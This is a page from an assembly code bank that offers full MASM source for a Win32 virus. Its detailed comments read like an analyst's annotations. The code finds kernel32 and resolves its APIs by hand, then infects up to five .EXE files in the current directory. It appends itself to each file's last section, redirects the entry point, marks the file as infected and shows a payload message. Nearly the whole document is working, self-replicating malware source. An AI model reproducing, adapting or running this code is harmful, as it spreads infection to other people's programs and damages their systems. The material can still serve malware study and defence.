
Win32 Virus - Assembly Code Bank


Win32 Virus
My little Win32 virus; it infects .exe files in the current directory. Compiler: MASM
                .386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

; VirusSize = byte length of the range VirusStart..VirusEnd in .code. This is
; exactly what Infection appends to a host; the variables declared after
; VirusEnd are NOT part of the copied body.
VirusSize      equ   (offset VirusEnd - offset VirusStart)
.data
; Static strings used only on the first-generation path (@1stGen), which
; calls the statically imported MessageBoxA.
OurTitle	 db "Message",0
OurMessage   db "This Is [Win32] Virus",10
			 db	"           by EdoVt",0

  
.code
;-----------------------------------------------------------------------
; Entry / body (analyst notes).
; VirusStart..VirusEnd is the byte range copied into the last section of
; each host. `start` is both the original build's entry point and the new
; AddressOfEntryPoint written into infected hosts, so every global
; reference in the body is ebp-relative (ebp = load delta computed below).
; Stack on entry: [esp] = return address into kernel32; FuckTheK32 walks
; backwards from it to find the kernel32 image base.
;-----------------------------------------------------------------------
VirusStart    label byte
start:
	nop
	nop
	pushad						; 8 dwords (20h bytes)
	pushfd						; +4: the entry-time [esp] is now at [esp+24h]
	call delta					; pushes the run-time address of `delta`
delta:
	pop ebp
	sub ebp,offset delta		; ebp = run-time minus link-time address (delta);
								; 0 when running as the original build
	mov eax,[esp+24h]			; eax = return address of the entry call, i.e. an
								; address inside kernel32 (see pushad/pushfd above)
	
	call FuckTheK32				; locate kernel32 and its export tables
	call GetAPIz				; fill OurFuncz with the addresses of OurAPIz names
	call Infect					; infect up to 5 *.EXE files in the current directory
	
    or ebp,ebp
	jz @1stGen					; delta == 0: original build (first generation)
	; delta != 0: running inside an infected host. Show the payload message
	; through dynamically resolved LoadLibraryA/GetProcAddress, then jump
	; to the host's original entry point.
	; LoadLibraryA("user32.dll")
	lea eax,[USER32DLL+ebp]
	push eax
	call [ebp+_LoadLibraryA]
	; eax = user32.dll module handle
	; GetProcAddress(hUser32, "MessageBoxA")
	lea ecx,[MESSAGEBOX+ebp]
	push ecx
	push eax
	call [ebp+_GetProcAddress]
	; eax = MessageBoxA address
	
	; MessageBoxA(NULL, Mess, MesTitle, 0)
	xor ebx,ebx
    push ebx
	lea ecx,[MesTitle+ebp]
	push ecx
	lea ecx,[Mess+ebp]
	push ecx
	push ebx
	call eax
	popfd
	popad
	; Return to host: eax = ImageBase + AddressOfEntryPoint of the host.
	; `org $-4` overlays each dd on the 32-bit immediate of the preceding
	; instruction, so when Infection stores the host's values into
	; ImageBase/EntryPoint it patches these immediates in place.
	mov eax,12345678h
	org $-4
ImageBase			dd 400000h
	add eax,12345678h
	org $-4
EntryPoint			dd 1000h
	jmp eax						; transfer control to the host's original entry point
	
	; Not reached: control already left via `jmp eax` above.
	push 0
	call ExitProcess

;-----------------------------------------------------------------------
; Infect: enumerate '*.EXE' in the current directory with FindFirstFileA/
; FindNextFileA and call Infection for each match, stopping once the
; Infections counter reaches 5. All API calls go through OurFuncz.
; In:    ebp = delta; OurFuncz filled by GetAPIz
; Out:   nothing meaningful in registers
; Clobb: eax, ecx, edi, flags, plus whatever Infection clobbers
;-----------------------------------------------------------------------
Infect:
	and [ebp+Infections],00000000h	; Infections = 0 (one-byte field)
	lea eax,[@WinFindData+ebp]
	push eax
	lea eax,[SearchMask+ebp]
	push  eax
	call [ebp+_FindFirstFileA]		; FindFirstFileA("*.EXE", &@WinFindData)
	inc eax
	or eax,eax
	jz FailInfect					; eax was -1 (INVALID_HANDLE_VALUE): no match
	dec eax
	mov [ebp+SearchHandle],eax
	
InfectIt:
	; Infection stores the candidate host's ImageBase/EntryPoint into the
	; body so the copied body carries them; save and restore ours so the
	; final `jmp eax` in start still returns to this process's host.
	push [ebp+EntryPoint]
	push [ebp+ImageBase]
	
	call Infection
	
	pop [ebp+ImageBase]
	pop [ebp+EntryPoint]
	
	inc [ebp+Infections]			; Infection's NoInfect path undoes this
	cmp [ebp+Infections],5
	jz CloseSearchHandle			; cap: 5 infections per run
	nop
	; Zero cFileName (MAX_PATH bytes) before FindNextFileA refills it.
	lea edi,[@WinFindData.cFileName+ebp]
	mov ecx,MAX_PATH
	xor al,al
rep stosb
	lea eax,[ebp+@WinFindData]
	push eax
	push dword ptr [ebp+SearchHandle]
	call [ebp+_FindNextFileA]		; FindNextFileA(hSearch, &@WinFindData)
	
	or eax,eax
	jnz InfectIt					; non-zero: another match to process
	
CloseSearchHandle:
	push [ebp+SearchHandle]
	call [ebp+_FindClose]
FailInfect:
	ret
	
;-----------------------------------------------------------------------
; Infection: append the body to the last section of the file named in
; @WinFindData.cFileName and point AddressOfEntryPoint at it.
; Sequence: clear attributes -> open -> map whole file -> check "PE"
; signature and the "Moon" marker at PE-4 -> remap at the aligned new size
; -> patch last section header and optional header -> write marker ->
; copy body -> unmap/close -> restore the original attributes.
; Every failure branch falls through the CloseMap/CloseFile/CantOpen
; cleanup chain at the bottom.
; In:    ebp = delta; @WinFindData filled by Find{First,Next}FileA
; Out:   ImageBase/EntryPoint hold the host's values after a successful
;        infection (the caller saves/restores them)
; Clobb: eax, ebx, ecx, edx, esi, edi, flags
;-----------------------------------------------------------------------
Infection:
	lea esi,dword ptr[ebp+@WinFindData.cFileName]
	push 80h
	push esi
	call [ebp+_SetFileAttributesA]	; SetFileAttributesA(name, 80h = FILE_ATTRIBUTE_NORMAL)
    call @OpenFile					; CreateFileA(name, read|write, ...) - see @OpenFile
	inc eax
	or eax,eax
	jz CantOpen						; INVALID_HANDLE_VALUE (-1)
	dec eax							; eax = file handle
	mov [ebp+FileHandle],eax
	xor ecx,ecx						; mapping size 0 = current file size
	call CreateMap
	or eax,eax
	jz CloseFile
	
	mov [ebp+MapHandle],eax
	mov ecx,[ebp+@WinFindData.nFileSizeLow]	; view size = file size (low dword only)
	call MapFile
	or eax,eax
	jz CloseMap
	mov [ebp+MapAddress],eax
	mov esi,[eax+3ch]				; e_lfanew
	add esi,eax						; esi = PE header inside the view
	mov eax,esi
	cmp word ptr[eax],'EP'			; "PE" signature present?
	jnz NoInfect
	; Infection marker: the dword just before the PE signature is set to
	; the ASCII bytes "Moon" after infection (see below), so its presence
	; means the file was already processed.
	cmp dword ptr [eax-04h],'nooM'
	jz NoInfect
	push dword ptr [eax+3ch]		; FileAlignment (PE+3Ch), popped after the unmap
	push dword ptr [ebp+MapAddress]
	call [ebp+_UnmapViewOfFile]
	
	push    dword ptr [ebp+MapHandle]
    call    [ebp+_CloseHandle]
	
	pop ecx							; ecx = FileAlignment
	mov eax,[ebp+@WinFindData.nFileSizeLow]
	add eax,VirusSize
	
	call @@Align					; eax = round_up(filesize + VirusSize, FileAlignment)
	mov [ebp+NewSize],eax
	xchg ecx,eax					; ecx = NewSize
	call CreateMap					; a mapping larger than the file grows it to NewSize
	or eax,eax
	jz CloseFile
	mov [ebp+MapHandle],eax
	mov ecx,[ebp+NewSize]
	
	call MapFile
	or eax,eax
	jz CloseMap
	mov [ebp+MapAddress],eax
	mov esi,[eax+3ch]
	add esi,eax						; PE header
	mov edi,esi						; edi = PE header for the rest of the routine
	add esi,78h						; PE+78h = start of the data directories (PE32)
	mov edx,[edi+74h]				; NumberOfRvaAndSizes
	shl edx,3						; * sizeof(IMAGE_DATA_DIRECTORY)
	add esi,edx						; esi = first section header
	movzx eax,word ptr [edi+06h]	; NumberOfSections
	dec eax
	imul eax,eax,28h				; * sizeof(IMAGE_SECTION_HEADER)
	add esi,eax						; esi = last section header
	
	; Record the host's original entry point and image base inside the
	; body, so the copied body can jump back to the host (`jmp eax` in start).
	mov eax,dword ptr[edi+28h]		; AddressOfEntryPoint
	mov dword ptr[ebp+EntryPoint],eax
	mov eax,dword ptr[edi+34h]		; ImageBase
	mov dword ptr[ebp+ImageBase],eax
	
	mov edx,dword ptr[esi+10h]		; SizeOfRawData (last section)
	mov ebx,edx
	add edx,dword ptr[esi+14h]		; edx = PointerToRawData + SizeOfRawData = file offset for the body
	
	push edx
	
	mov eax,dword ptr[esi+0ch]		; VirtualAddress (last section)
	add eax,ebx						; + SizeOfRawData = RVA of the appended body
	mov dword ptr [ebp+OurEntryPoint],eax
	mov dword ptr[edi+28h],eax		; new AddressOfEntryPoint -> the body
	
	mov eax,dword ptr[esi+10h]
	add eax,VirusSize
	push eax						; unaligned SizeOfRawData + VirusSize, reused below
	mov ecx,[edi+3ch]				; FileAlignment
	call @@Align
	mov dword ptr[esi+10h],eax		; new SizeOfRawData
	
	mov ecx,[edi+038h]				; SectionAlignment
	pop eax
	call @@Align
	shl eax,1						; doubled - presumably to leave room for the
									; variables after VirusEnd, which are not copied
	mov dword ptr[esi+08h],eax		; new VirtualSize
	
	pop edx							; edx = file offset where the body is written
    add     eax,dword ptr[esi+0Ch]	; + VirtualAddress (last section)
    mov     dword ptr[edi+50h],eax	; new SizeOfImage
	
	; Section Characteristics |= CNT_CODE (20h) | MEM_EXECUTE | MEM_WRITE
	or dword ptr [esi+24h],0A0000020h
	
	mov dword ptr [edi-04h],"nooM"	; write the "Moon" marker at PE-4
	
	lea esi,[ebp+start]				; source: the running body (start == VirusStart)
	
	mov edi,edx
	
	add edi,[ebp+MapAddress]		; destination inside the new view
	
	mov ecx,VirusSize
	
rep	movsb
	
	push dword ptr [ebp+MapAddress]
	call [ebp+_UnmapViewOfFile]
	
	jmp CloseMap
	
	
NoInfect:
	; Cancel the caller's per-file increment so skipped files do not count
	; toward the cap. Note: word-sized access to the one-byte Infections field.
	dec word ptr [ebp+Infections]
CloseMap:
	push dword ptr [ebp+MapHandle]
	call [ebp+_CloseHandle]
CloseFile:
	push dword ptr [ebp+FileHandle]
	call [ebp+_CloseHandle]
CantOpen:
	; Restore the attributes reported by the directory search.
	push    dword ptr [ebp+@WinFindData.dwFileAttributes]
    lea     eax,[ebp+@WinFindData.cFileName]       
    push    eax
    call    [ebp+_SetFileAttributesA]
    ret

;-----------------------------------------------------------------------
; @@Align: round eax up to the next multiple of ecx.
; In:    eax = value, ecx = alignment (a zero ecx would fault in `div`)
; Out:   eax = value rounded up; unchanged when already a multiple
; Clobb: edx (remainder), ecx (becomes ecx - remainder when padding), flags
;-----------------------------------------------------------------------
@@Align  proc
	xor edx,edx					; edx:eax / ecx
	push eax
	div ecx
	pop eax						; restore the value; edx = remainder
	or edx,edx
	jz Enough					; already aligned
	sub ecx,edx					; ecx = padding needed
	add eax,ecx
Enough:	ret
@@Align endp
	
	
;-----------------------------------------------------------------------
; MapFile: MapViewOfFile([MapHandle], FILE_MAP_WRITE (2), 0, 0, ecx)
; In:    ebp = delta; [ebp+MapHandle] = mapping object; ecx = bytes to map
; Out:   eax = view base address, or 0 on failure
; Clobb: eax, ecx, edx (stdcall callee cleans the arguments)
;-----------------------------------------------------------------------
MapFile    proc
	xor eax,eax
	push ecx					; dwNumberOfBytesToMap
	push eax					; dwFileOffsetLow
	push eax					; dwFileOffsetHigh
	push 02h					; dwDesiredAccess = FILE_MAP_WRITE
	push [ebp+MapHandle]
	call [ebp+_MapViewOfFile]
	ret
MapFile endp
	
	
	
		
	
;-----------------------------------------------------------------------
; CreateMap: CreateFileMappingA([FileHandle], NULL, PAGE_READWRITE (4),
;            0, ecx, NULL)
; In:    ebp = delta; [ebp+FileHandle] = open file; ecx = maximum size
;        (low dword; 0 = current file size). A size larger than the file
;        grows the file - Infection relies on this to append the body.
; Out:   eax = mapping handle, or 0 on failure
; Clobb: eax, ecx, edx (stdcall callee cleans the arguments)
;-----------------------------------------------------------------------
CreateMap  proc
	xor eax,eax
	push eax					; lpName = NULL
	push ecx					; dwMaximumSizeLow
	push eax					; dwMaximumSizeHigh
	push 04h					; flProtect = PAGE_READWRITE
	push eax					; lpFileMappingAttributes = NULL
	push [ebp+FileHandle]
	call [ebp+_CreateFileMappingA]
	ret
CreateMap endp
	
	
	
	
;-----------------------------------------------------------------------
; @OpenFile: CreateFileA(esi, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ,
;            NULL, OPEN_EXISTING, 0, NULL)
; In:    ebp = delta; esi = pointer to the NUL-terminated file name
; Out:   eax = file handle, or -1 (INVALID_HANDLE_VALUE) on failure
; Clobb: eax, ecx, edx (stdcall callee cleans the arguments)
;-----------------------------------------------------------------------
@OpenFile    proc			; esi = pointer to the file name
	xor eax,eax
	push eax					; hTemplateFile = NULL
	push eax					; dwFlagsAndAttributes = 0
	push 03h					; dwCreationDisposition = OPEN_EXISTING
	push eax					; lpSecurityAttributes = NULL
	push 01h					; dwShareMode = FILE_SHARE_READ
	push 80000000h or 40000000h	; GENERIC_READ | GENERIC_WRITE
	push esi					; lpFileName
	call [ebp+_CreateFileA]
	ret
@OpenFile  endp

	
;-----------------------------------------------------------------------
; FuckTheK32: locate the kernel32 image and its export directory.
; Starting from an address inside kernel32 (eax), steps backwards one byte
; at a time until a "MZ" word is found and takes that as the image base,
; verifies the "PE" signature, then reads the export directory and stores
; the absolute addresses of its three tables.
; In:    eax = an address inside kernel32 (set up in start); ebp = delta
; Out:   [Kernel_MZ], [Kernel_PE], [ExpAddrTableVA], [ExpNameTableVA],
;        [ExpOrdinalTableVA] set; DF cleared
; Clobb: eax, esi, flags
; Note:  the scan stops at the first "MZ" word encountered; the only
;        validation is the "PE" check, and a failed check ends the process.
;-----------------------------------------------------------------------
FuckTheK32	proc			; eax = address inside kernel32 (see start)
	@loop:
	cmp word ptr [eax],"ZM"		; "MZ" at this address?
	jz WeGotK32MZ
	dec eax						; step back one byte
	jmp @loop
WeGotK32MZ:	
	mov [Kernel_MZ+ebp],eax		; candidate image base
	add eax,3ch
	mov eax,[eax]				; e_lfanew
	add eax,[ebp+Kernel_MZ]		; eax = PE header address
	cmp word ptr [eax],"EP"
	jz WeGotK32

	; No "PE" signature behind the "MZ" found: ExitProcess(0)
	push 0
	call ExitProcess
WeGotK32:
	cld							; the lodsd below walk forward
	mov [Kernel_PE+ebp],eax
	mov esi,eax					; esi = PE header
	add esi,78h					; DataDirectory[0] = export directory
	lodsd						; eax = export directory RVA
	add eax,[Kernel_MZ+ebp]		; -> address
	mov esi,eax
	add esi,1ch					; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
	lodsd						; eax = AddressOfFunctions RVA
	add eax,[Kernel_MZ+ebp]
	mov [ExpAddrTableVA+ebp],eax	; function RVA table
	lodsd						; eax = AddressOfNames RVA (+20h)
	add eax,[Kernel_MZ+ebp]
	mov [ExpNameTableVA+ebp],eax	; name RVA table
	lodsd						; eax = AddressOfNameOrdinals RVA (+24h)
	add eax,[Kernel_MZ+ebp]
	mov [ExpOrdinalTableVA+ebp],eax	; ordinal table
	ret

FuckTheK32 endp
	
;-----------------------------------------------------------------------
; GetAPIz: resolve every name in OurAPIz by a linear search of kernel32's
; export name table and store the addresses, in order, into OurFuncz
; (after this, [ebp+_FindFirstFileA] etc. are usable).
; Per name: ecx = strlen+1; walk AddressOfNames comparing the full string
; (repe cmpsb, NUL included) while Counter tracks the index; on a match
; use AddressOfNameOrdinals[Counter] -> AddressOfFunctions[ordinal] and
; store base + RVA with stosd. Stops when the next name is "Verj".
; In:    ebp = delta; Kernel_MZ / Exp*TableVA set by FuckTheK32
; Out:   OurFuncz filled
; Clobb: eax, ebx, ecx, edx, esi, edi, [Counter], flags; DF cleared
; Note:  the name-table walk has no upper bound (NumberOfNames is not read).
;-----------------------------------------------------------------------
GetAPIz		proc
	cld
	lea ebx,[OurAPIz+ebp]		; ebx = current API name
	lea edi,[OurFuncz+ebp]		; edi = next output slot
begin:
	push edi					; keep the output slot across the search
	mov [Counter+ebp],0			; index into the export name table
	xor ecx,ecx
	mov esi,ebx
@_1: lodsb
	inc ecx
	or al,al
	jnz @_1						; ecx = length including the NUL
	mov edx,ecx					; edx = saved length
	mov edi,ebx
	mov esi,[ExpNameTableVA+ebp]
	push esi					; [esp] = current AddressOfNames entry
@_2:lodsd
	mov esi,eax
	add esi,[Kernel_MZ+ebp]		; esi = exported name string
    repe cmpsb					; compare ecx bytes with our name
	jz TheyAreEqual
	pop esi
	add esi,4					; next AddressOfNames entry
	push esi
	mov edi,ebx
	mov ecx,edx
	inc word ptr [Counter+ebp]
	jmp @_2
TheyAreEqual:
	pop esi						; discard the saved table pointer
	pop edi						; edi = output slot
	xor esi,esi
	add ebx,edx					; ebx -> next name in OurAPIz
	xor eax,eax
	mov si,[Counter+ebp]
	shl esi,1					; * sizeof(WORD)
	add esi,[ExpOrdinalTableVA+ebp]
	lodsw						; ax = ordinal
	mov esi,eax
	shl esi,2					; * sizeof(DWORD)
	add esi,[ExpAddrTableVA+ebp]
	lodsd						; eax = function RVA
	add eax,[Kernel_MZ+ebp]
	stosd						; store the address, advance edi
	cmp dword ptr [ebx],"jreV"	; "Verj" terminator after the last name?
	jnz begin
	ret
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
	
	
	
	
;-----------------------------------------------------------------------
; Body-resident data: everything up to VirusEnd is copied with the body.
;-----------------------------------------------------------------------
Infections			db 0			; files infected in this run (cap 5, see Infect)
OurEntryPoint		dd 1000h		; RVA of the body in the last infected host
Counter				dw 0			; export name-table index used by GetAPIz
USER32DLL			db "user32.dll",0
MESSAGEBOX			db "MessageBoxA",0
MesTitle			db "Got Ya !!!!!!!!!!!!!",0	; payload message box title
Mess				db "Everything under the sun is in tune,",10
					db	"But the sun is eclipsed by the MOON.",10
					db	"                               Pink Floyd",10,10
					db	"This File Is Infected By ",0
SearchMask			db '*.EXE',0	; FindFirstFileA pattern (current directory)

; NUL-separated API names resolved by GetAPIz, in the same order as the
; OurFuncz slots below; "Verj" terminates the list.
OurAPIz		label byte
@FindFirstFileA		db "FindFirstFileA",0
@FindNextFileA		db "FindNextFileA",0
@FindClose			db "FindClose",0
@CloseHandle		db "CloseHandle",0
@CreateFileA		db "CreateFileA",0
@SetFilePointer		db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile		db "MapViewOfFile",0
@UnmapViewOfFile	db "UnmapViewOfFile",0
@SetEndOfFile		db "SetEndOfFile",0
@LoadLibraryA		db "LoadLibraryA",0
@GetProcAddress		db "GetProcAddress",0
					db "Verj",0
VirusEnd    label byte
; Nothing below VirusEnd is copied into hosts; it is filled at run time.
; In an infected host this area presumably sits in the extra virtual size
; that Infection reserves past the body (the doubled VirtualSize).
OurFuncz	label byte
_FindFirstFileA		dd 0
_FindNextFileA		dd 0
_FindClose			dd 0
_CloseHandle		dd 0
_CreateFileA		dd 0
_SetFilePointer     dd 0		; resolved but not called in this file
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile		dd 0
_UnmapViewOfFile    dd 0
_SetEndOfFile		dd 0		; resolved but not called in this file
_LoadLibraryA		dd 0
_GetProcAddress     dd 0
@WinFindData		WIN32_FIND_DATA  <>	; current search result
SearchHandle		dd ?
FileHandle			dd ?
MapHandle			dd ?
MapAddress			dd ?
NewSize				dd ?			; aligned size of the host after infection
OurDelta			dd ?			; not referenced in this file
HostStart           dd ?			; not referenced in this file
Kernel_MZ	 		dd ?			; kernel32 image base (FuckTheK32)
Kernel_PE	 		dd ?			; kernel32 PE header
ExpAddrTableVA 		dd ?			; kernel32 AddressOfFunctions
ExpNameTableVA 		dd ?			; kernel32 AddressOfNames
ExpOrdinalTableVA	dd ?			; kernel32 AddressOfNameOrdinals



;-----------------------------------------------------------------------
; @1stGen: reached from start when delta == 0 (the original build).
; FuckTheK32/GetAPIz/Infect have already run by this point; this path
; only restores the saved registers, shows OurMessage via the statically
; imported MessageBoxA and exits instead of jumping to a host.
;-----------------------------------------------------------------------
@1stGen:
	popfd
	popad
	xor eax,eax
	push eax					; uType = 0
	push offset OurTitle		; lpCaption
	push offset OurMessage		; lpText
	push eax					; hWnd = NULL
	call MessageBoxA
	
	push 0
	call ExitProcess			; does not return
	
end start


            